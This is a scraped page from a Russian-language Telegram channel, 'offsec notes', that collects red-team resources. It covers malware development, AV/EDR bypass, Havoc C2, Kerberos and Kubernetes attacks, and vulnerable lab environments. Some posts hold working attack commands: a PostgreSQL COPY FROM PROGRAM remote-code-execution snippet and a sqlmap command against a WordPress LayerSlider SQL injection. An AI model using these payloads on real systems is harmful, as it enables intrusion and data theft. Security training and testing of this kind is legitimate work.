NEW BOT Телеграм, страница

Forwarded from Proxy Bar

ARTToolkit
*
Интерактивная шпаргалка, содержащая полезный список наступательных инструментов безопасности и соответствующих им команд/полезных данных, которые можно использовать в redteam
*
Link

248 views07:06

offsec notes

malware development useful links

BypassAV - Repo with the essential techniques to bypass antivirus and EDR

Bypass AV (practical examples) - useful examples & links

shellcode-fluctuation - article

executing the payload in memory - article

maldev-for-dummies - A workshop about Malware Development

The post will be updated
#maldev

284 viewsedited 09:41

offsec notes

Kerberos delegations

Link

luemmelsec.github.io

S4fuckMe2selfAndUAndU2proxy - A low dive into Kerberos delegations

Hello fellow h4x0rs, this time we are going to have a closer look at the different types of delegations inside an Active Directory.
We’ll try to figure out what this magic is all about and of course how we can abuse it for fun and profit.

Prepare yourself…

352 views15:12

offsec notes

Forwarded from Reverse Dungeon

https://medium.com/@sam.rothlisberger/havoc-c2-with-av-edr-bypass-methods-in-2024-part-1-733d423fc67b

Medium

Havoc C2 with AV/EDR Bypass Methods in 2024 (Part 1)

Havoc C2 with AV/EDR Bypass Methods in 2024 (Part 1) DISCLAIMER: Using these tools and methods against hosts that you do not have explicit permission to test is illegal. You are responsible for any …

280 views09:43

offsec notes

Advanced sql injection techniques

Advanced SQL Injection Cheatsheet
SQL Injection Knowledge Base
sqlwiki

285 views18:36

offsec notes

Forwarded from xclip

Статьи по созданию кастомных нагрузов для Havoc C2

- https://notateamserver.xyz/havoc-implant/

- https://codex-7.gitbook.io/codexs-terminal-window/red-team/red-team-dev/extending-havoc-c2/third-party-agents

- https://payloads.online/archivers/2023/10/12/fda899c9-47ea-40e6-b6fc-a00600ccc9cb

#malware #redteam

275 views13:09

offsec notes

Forwarded from Offensive Xwitter

😈 [ MDSec @MDSecLabs ]

Interested in sharpening your red team AD recon? Check out our latest post by @domchell, "Active Directory Enumeration for Red Teams"

🔗 https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams/

🐥 [ tweet ]

301 views13:27

offsec notes

312 views22:29

offsec notes

Жуков_Андрей_Хакерство_Физические_атаки_с_использованием_хакерских.pdf

38.6 MB

🤯1

331 views22:29

offsec notes

ntlm directories scanner - utility for searching directories that accept ntlm in services such as

* OWA servers
* Skype for Business/Lync servers
* Autodiscover servers (autodiscover.domain.com and lyncdiscover.domain.com)
* ADFS servers

GitHub

GitHub - nyxgeek/ntlmscan: scan for NTLM directories

scan for NTLM directories. Contribute to nyxgeek/ntlmscan development by creating an account on GitHub.

🐳1

311 viewsedited 16:16

offsec notes

Forwarded from Внутрянка

Материал про пентест 1С

Ardent101

Еще 1 раз про пентест 1С

Введение Настоящий материал по большей части состоит из общедоступных наработок других людей. Целью было проверить указанные наработки на практике и собрать получившиеся результаты в одном месте. Именно этим объясняется название статьи.
Продолжу рассуждение…

291 views16:30

offsec notes

Для любителей All-in-one
Web-check - open source инструмент для поиска информации о веб-приложении/хосте.

Совершает такие проверки, как

* IP Info
* Server Info
* DNS Records
* Email Configuration
* Open Ports
etc

303 views22:16

offsec notes

Kubernetes Goat - Учебная платформа с лабами и материалами по безопасности куба

* Learning Kubernetes
* OWASP Kubernetes Top 10
* MITRE for kube
* Lab’s scenarios

#kubernetes

Madhuakula

Welcome to Kubernetes Goat | Kubernetes Goat

Interactive Kubernetes Security Learning Playground

340 viewsedited 09:28

offsec notes

RCE in postgres

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;

Автоматизация - Link
(Закомментить checkVersion(connection))

Exploit Database

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated). CVE-2019–9193 . remote exploit for Multiple platform

442 views09:45

offsec notes

Forwarded from Омский багхантер

Самый быстрый способ получить список всех путей веб-приложения на Next.js:

console.log(__BUILD_MANIFEST.sortedPages)

365 views11:30

offsec notes

Forwarded from k8s (in)security (r0binak)

Исследователи из WIZ опубликовали OpenSource инструмент NamespaceHound, который позволит найти вектора повышения привилегий в Kubernetes кластерах, где мультитенантность организована на уровне namespaces.

По сути, инструмент сочетает в себе функционал RBAC анализатора и PolicyEngine – он ищет возможные опасные права в кластере, а также избыточно привилегированные и опасные контейнеры (BadPods), с помощью которых потенциальный злоумышленник может нанести существенный импакт кластеру. Сейчас их внутренняя библиотека насчитывает 21 правило.

Более подробно о самом инструменте и мотивации его создания можно почитать в статье NamespaceHound: protecting multi-tenant K8s clusters.

405 views09:56

offsec notes

Kubernetes Privilege Escalation
Link

457 views09:58

offsec notes

Утилиты для проведения CIS docker / kubernetes Benchmark'ов

* docker-bench-security
* kube-bench

CIS

CIS Docker Benchmarks

Download our step-by-step checklist to secure your platform: An objective, consensus-driven security guideline for Docker.

367 viewsedited 19:55

offsec notes

CI/CD

Gitea + Jenkins lab: https://github.com/cider-security-research/cicd-goat

GitHub

GitHub - cider-security-research/cicd-goat: A deliberately vulnerable CI/CD environment. Learn CI/CD security through multiple…

A deliberately vulnerable CI/CD environment. Learn CI/CD security through multiple challenges. - cider-security-research/cicd-goat

❤1

392 views15:54

offsec notes

Forwarded from Proxy Bar

CVE-2024-2879 LayerSlider плагин для WordPress
*
Версии LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
*
Недостаточне экранирование позволяет добавлять дополнительные SQL-запросы к уже существующим, как итог = можно использовать для извлечения конфиденциальной информации из базы данных.
*
POC usage:

sqlmap "https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T

#wordpress

402 views20:32

offsec notes

Forwarded from Threat Hunt

#maldev #redteam

Инструмент для имитации поведения AV/EDR. Утилита позволяет оттачивать навыки обхода средств защиты при создании своих загрузчиков.

1. Собираем проект ./compile.sh
2. Создаём файл ioc.json с паттернами шелл-кода
3. Запускаем инструмент, указываем идентификатор вредоносного процесса: .\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

https://github.com/Helixo32/CrimsonEDR

GitHub

GitHub - Helixo32/CrimsonEDR: Simulate the behavior of AV/EDR for malware development training.

Simulate the behavior of AV/EDR for malware development training. - Helixo32/CrimsonEDR

462 views09:31

About

Blog

Apps

Platform